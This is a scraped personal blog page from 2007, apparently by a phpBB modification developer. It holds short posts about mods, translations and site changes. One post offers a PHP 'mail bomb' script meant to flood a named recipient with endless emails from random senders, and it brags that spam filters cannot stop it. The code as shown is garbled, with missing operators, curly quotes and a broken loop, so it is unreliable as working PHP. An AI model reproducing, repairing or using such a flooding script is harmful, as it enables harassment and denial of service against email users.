Warning: fopen(/mounted-storage/home88b/sub002/sc39196-AZGY/jan/janmarques.net/wp-content/cache/wp_cache_mutex.lock) [function.fopen]: failed to open stream: Permission denied in /mounted-storage/home88b/sub002/sc39196-AZGY/jan/janmarques.net/wp-content/plugins/wp-cache/wp-cache-phase2.php on line 96
Jan Marques
May 18

phpBB.com Topic // phpBB.nl Topic // phpBBHacks Page // phpBBModders.net Topic

May 18

phpBB.com Topic // phpBB.nl Topic // phpBBHacks Page // phpBBModders.net Topic

May 18

phpBB.nl Topic // phpBBHacks Page // phpBBModders.net Topic

May 18

Currently in development!
phpBB.nl Topic // phpBBModders.net Topic

May 18

Hi all,
below, a file that can be used to send a mail bomb :)
You only need to change target@target.com, for the target.
He will get hundreds/thousends of email with random title/sender/content :)
Result => no spam filter can resist :D

<?php 
# [BOM.PHP]
# © Jan Marques, 2007
#
/* Edit reciepent */
$target “bill@microsoft.com”;
/* The script */
set_time_limit(1);
while(
true
{
    
mail($targetmd5(rand()), md5(rand()), “From: ” md5(rand()) . “@” md5(rand()) . “.” md5(rand()));
}
?>


May 18

Translating phpBB 3 to dutch to be prepared for RC1 :)

May 17

Thanks to Evil>3 and John Hjorth, now also Danish and German are available :)

May 17

From today on, Janmarques.net is also available in Dutch :D

As you can see, I’ve did some changes to the header and blog too…

May 16

Bit boring over here, so why not post it :D